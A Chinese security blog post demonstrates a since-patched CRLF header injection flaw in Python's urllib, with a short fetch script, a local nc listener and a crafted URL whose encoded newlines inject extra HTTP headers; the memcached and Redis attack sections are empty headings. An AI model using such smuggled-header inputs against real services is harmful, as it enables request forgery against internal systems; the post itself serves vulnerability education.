<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  

  
  <title>Python urllib HTTP头注入漏洞 | 可乐&#39;blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="Python的urllib库（在Python2中为 urllib2 ，在Python3中为 urllib ）有一个HTTP协议下的协议流注入漏洞。如果攻击者可以控制Python代码访问任意URL或者让Python代码访问一个恶意的web servr，那这个漏洞可能会危害内网服务安全。HTTP协议解析host的时候可以接受百分号编码的值，解码，然后包含在HTTP数据流里面，但是没有进一步的验证或者编">
<meta name="keywords" content="web安全">
<meta property="og:type" content="article">
<meta property="og:title" content="Python urllib HTTP头注入漏洞">
<meta property="og:url" content="https://style-404.github.io/2019/03/22/Python-urllib-HTTP头注入漏洞/index.html">
<meta property="og:site_name" content="可乐&#39;blog">
<meta property="og:description" content="Python的urllib库（在Python2中为 urllib2 ，在Python3中为 urllib ）有一个HTTP协议下的协议流注入漏洞。如果攻击者可以控制Python代码访问任意URL或者让Python代码访问一个恶意的web servr，那这个漏洞可能会危害内网服务安全。HTTP协议解析host的时候可以接受百分号编码的值，解码，然后包含在HTTP数据流里面，但是没有进一步的验证或者编">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g1bi52sbu3j30qk07cmxh.jpg">
<meta property="og:updated_time" content="2019-03-22T11:39:39.307Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Python urllib HTTP头注入漏洞">
<meta name="twitter:description" content="Python的urllib库（在Python2中为 urllib2 ，在Python3中为 urllib ）有一个HTTP协议下的协议流注入漏洞。如果攻击者可以控制Python代码访问任意URL或者让Python代码访问一个恶意的web servr，那这个漏洞可能会危害内网服务安全。HTTP协议解析host的时候可以接受百分号编码的值，解码，然后包含在HTTP数据流里面，但是没有进一步的验证或者编">
<meta name="twitter:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g1bi52sbu3j30qk07cmxh.jpg">
  
    <link rel="alternate" href="/atom.xml" title="可乐&#39;blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">可乐&#39;blog</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://style-404.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-Python-urllib-HTTP头注入漏洞" class="article article-type-post" itemscope="" itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/03/22/Python-urllib-HTTP头注入漏洞/" class="article-date">
  <time datetime="2019-03-22T11:24:59.000Z" itemprop="datePublished">2019-03-22</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Python urllib HTTP头注入漏洞
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>Python的urllib库（在Python2中为 urllib2 ，在Python3中为 urllib ）有一个HTTP协议下的协议流注入漏洞。如果攻击者可以控制Python代码访问任意URL或者让Python代码访问一个恶意的web servr，那这个漏洞可能会危害内网服务安全。<br>HTTP协议解析host的时候可以接受百分号编码的值，解码，然后包含在HTTP数据流里面，但是没有进一步的验证或者编码，这就可以注入一个换行符。<br>注:现在的python版本已经修复了<br><figure class="highlight d"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!python</span></span><br><span class="line"><span class="meta">#!/usr/bin/env python3  </span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"><span class="keyword">import</span> urllib.error</span><br><span class="line"><span class="keyword">import</span> urllib.request   </span><br><span class="line"></span><br><span class="line">url = sys.argv[<span class="number">1</span>]   </span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">    info = urllib.request.urlopen(url).info()</span><br><span class="line">    print(info)</span><br><span class="line">except urllib.error.URLError as e:</span><br><span class="line">    print(e)</span><br></pre></td></tr></table></figure></p>
<p>这段代码只是从命令行参数接收一个URL，然后去访问它。为了查看 urllib 获取的HTTP头，我们用一个nc来监听端口。<br>在命令行输入<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -l -<span class="selector-tag">p</span> <span class="number">12345</span></span><br></pre></td></tr></table></figure></p>
<p>重新打开一个窗口运行py文件<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fetch3<span class="selector-class">.py</span> http:<span class="comment">//127.0.0.1:12345/style</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g1bi52sbu3j30qk07cmxh.jpg" alt=""></p>
<p>可以看到,在server得到了http请求头<br>然后我们使用恶意构造的地址<br><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./fetch<span class="number">3</span>.py http://<span class="number">127.0</span>.<span class="number">0.1</span><span class="symbol">%0</span>d<span class="symbol">%0</span>aX-injected:<span class="symbol">%20</span>header<span class="symbol">%0</span>d<span class="symbol">%0</span>ax-leftover:<span class="symbol">%20</span>:<span class="number">12345</span>/foo</span><br></pre></td></tr></table></figure></p>
<p>返回的HTTP头就是<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!shell</span></span><br><span class="line"><span class="builtin-name">GET</span> /foo HTTP/1.1</span><br><span class="line">Accept-Encoding: identity</span><br><span class="line">User-Agent: Python-urllib/3.4</span><br><span class="line">Host: 127.0.0.1</span><br><span class="line">X-injected: header</span><br><span class="line">x-leftover: :12345</span><br><span class="line">Connection: close</span><br></pre></td></tr></table></figure></p>
<h1 id="攻击面"><a href="#攻击面" class="headerlink" title="攻击面"></a>攻击面</h1><h2 id="HTTP头注入和请求伪造"><a href="#HTTP头注入和请求伪造" class="headerlink" title="HTTP头注入和请求伪造"></a>HTTP头注入和请求伪造</h2><h2 id="攻击memcached"><a href="#攻击memcached" class="headerlink" title="攻击memcached"></a>攻击memcached</h2><h2 id="攻击Redis"><a href="#攻击Redis" class="headerlink" title="攻击Redis"></a>攻击Redis</h2><h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="https://strcpy.me/index.php/archives/749/" target="_blank" rel="noopener">https://strcpy.me/index.php/archives/749/</a><br><a href="http://www.anquan.us/static/drops/papers-16905.html" target="_blank" rel="noopener">http://www.anquan.us/static/drops/papers-16905.html</a><br><a href="https://security.tencent.com/index.php/blog/msg/106" target="_blank" rel="noopener">https://security.tencent.com/index.php/blog/msg/106</a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://style-404.github.io/2019/03/22/Python-urllib-HTTP头注入漏洞/" data-id="cjvrp4gix000w5gqr8e1hq6aj" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web安全/">web安全</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/03/23/flask框架学习/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          flask框架学习
        
      </div>
    </a>
  
  
    <a href="/2019/03/21/PHP-MVC开发框架学习/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">PHP MVC开发框架学习</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/python/">python</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/web安全/">web安全</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/日记/">日记</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/">CTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Linux/">Linux</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SSH/">SSH</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/c/">c++</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web安全/">web安全</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/writeup/">writeup</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/代码审计/">代码审计</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/开发/">开发</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/日记/">日记</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/汇编/">汇编</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/爬虫/">爬虫</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/CTF/" style="font-size: 20px;">CTF</a> <a href="/tags/Linux/" style="font-size: 10px;">Linux</a> <a href="/tags/SSH/" style="font-size: 10px;">SSH</a> <a href="/tags/c/" style="font-size: 10px;">c++</a> <a href="/tags/web安全/" style="font-size: 15px;">web安全</a> <a href="/tags/writeup/" style="font-size: 10px;">writeup</a> <a href="/tags/代码审计/" style="font-size: 12.5px;">代码审计</a> <a href="/tags/开发/" style="font-size: 17.5px;">开发</a> <a href="/tags/日记/" style="font-size: 10px;">日记</a> <a href="/tags/汇编/" style="font-size: 10px;">汇编</a> <a href="/tags/爬虫/" style="font-size: 10px;">爬虫</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/05/">May 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/04/">April 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/03/">March 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/02/">February 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/01/">January 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/12/">December 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/11/">November 2018</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2019/05/17/网易云音乐免费下载/">网易云音乐免费下载</a>
          </li>
        
          <li>
            <a href="/2019/05/11/linux学习笔记/">linux学习笔记</a>
          </li>
        
          <li>
            <a href="/2019/05/11/docker学习/">docker学习</a>
          </li>
        
          <li>
            <a href="/2019/05/08/test/">test</a>
          </li>
        
          <li>
            <a href="/2019/04/19/PHP-sprintf格式化字符串漏洞/">PHP sprintf格式化字符串漏洞</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2019 筱阳<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



  </div>
</body>
</html>